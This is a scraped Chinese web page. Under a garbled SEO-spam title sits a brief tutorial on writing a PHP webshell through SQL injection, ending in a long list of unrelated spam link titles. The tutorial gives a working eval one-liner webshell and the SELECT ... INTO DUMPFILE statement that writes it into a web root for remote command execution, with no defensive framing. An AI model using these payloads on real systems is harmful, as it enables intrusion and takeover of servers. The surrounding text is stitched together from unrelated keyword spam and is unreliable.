当前位置: 首页 > wzjs >正文

网站服务器在本地是指广西seo快速排名

网站服务器在本地是指,广西seo快速排名,中铁建设集团有限公司官网,c 做网站源码实例一、INSERT INTO基于数据写入的SQL注入 1.1、条件 1、Web应用提供上传文件功能&#xff0c;用户上传的文件路径会存储在数据库中 2、数据库内容可影响Web资源访问路径 3、用户有写的权限 1.2、示例 首先我们上传一个shell.php到web应用中&#xff0c;其内容为<?php e…

一、INSERT INTO基于数据写入的SQL注入

1.1、条件

1、Web应用提供上传文件功能,用户上传的文件路径会存储在数据库中

2、数据库内容可影响Web资源访问路径

3、用户有写的权限

1.2、示例

首先我们上传一个shell.php到web应用中,其内容为<?php @eval($_POST['cmd']); ?>

然后通过SQL注入:

-- 恶意注入
INSERT INTO uploads (file_path) VALUES ('/var/www/html/shell.php'); -- 写入Webshell路径

访问 http://target.com/shell.php 后,通过POST方式传入 cmd 参数,即可执行恶意PHP代码。

二、SELECT INTO DUMPFILE基于备份与还原的SQL注入

1.1、条件

1、开启file权限(默认不开放)

2、Web服务器用户需有写权限

3、secure_file_priv为空(默认为NULL,NULL不是空)

1.2、示例

-- 正常查询
SELECT data FROM users WHERE id=1;-- 恶意注入
SELECT '<?php @eval($_POST["cmd"]); ?>' INTO DUMPFILE '/var/www/html/shell.php';

补充:与into outfile不同,into dumpfile直接写入文件,没有任何格式化处理,而into outfile会自动添加换行符、制表符,会破坏webshell。

http://www.dtcms.com/wzjs/65696.html

相关文章:

  • 网站建设接外包流程图长沙正规竞价优化推荐
  • 芜湖哪家公司做网站不错今天疫情最新消息
  • 青海西宁制作网站公司西安seo工作室
  • 通过企业画册宣传_网络网站建设_新闻媒体合作等方式_厦门网站建设公司
  • 网站建设好后 如何验收今日头条国际军事新闻
  • 官方网站下载安装qq门户网站
  • 安阳做网站优化微信公众号推广软文案例
  • 西安网站建设排名百度推广后台登录入口
  • 做外贸怎么在阿里云建网站seo站长工具
  • 苏州宿迁工业园区广州seo网站推广
  • 自己建设自己的网站如何提高百度搜索排名
  • 做动态的网站在哪里做推广效果好
  • 企业网站制作套餐百度关键词排名点
  • 有什么免费ppt模板网站seo精灵
  • 网站建设数据库是什么网页设计与制作作业成品
  • 做企业网站用drupal7百度电商广告代运营
  • 网站logo织梦怎么做长沙百度推广公司电话
  • 怎么被百度收录seo如何优化图片
  • 做外贸一般在什么网站好seo外链网
  • 深圳龙岗个人网站建设深圳优化seo
  • 做企业培训的网站成都门户网站建设
  • 三网合一网站开发是什么seo软文代写
  • 网站群建设接入指南怎么做网络营销推广
  • 软件开发案例展示泰安seo网络公司
  • 做网站标题头像网店推广
  • 领地免费网站开发想要网站推广页
  • 一起做网站可以一件代发吗线上推广的方式
  • 深圳信用网官网运营seo是什么意思
  • 怎么做网站的动效南宁百度关键词优化
  • 国家和住房城乡建设部网站首页医院线上预约